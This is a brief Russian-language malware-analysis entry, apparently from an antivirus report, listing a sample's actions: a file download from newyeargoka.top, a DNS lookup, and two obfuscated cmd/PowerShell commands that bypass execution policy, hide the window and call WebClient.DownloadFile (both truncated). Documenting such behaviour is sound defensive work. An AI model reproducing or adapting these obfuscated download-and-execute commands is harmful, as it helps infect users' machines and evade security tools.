Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powE^Rsh^elL.eXE -exe^C^utIon^POl^ICy ^bYp^AsS ^-NO^PROfIle^ ^-win^DOwStYlE h^i^D^deN (^nE^W-oBjE^CT s^Yst^EM.N^et.wEBcliENt)^.DoW^nL^O^A^Df^ILe^('http://newyeargoka.top/read....
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "powE^Rsh^elL.eXE -exe^C^utIon^POl^ICy ^bYp^AsS ^-NO^PROfIle^ ^-win^DOwStYlE h^i^D^deN (^nE^W-oBjE^CT s^Yst^EM.N^et.wEBcliENt)^.DoW^nL^O^A^Df^ILe^('http://newyeargoka.top/read....' (со скрытым окном)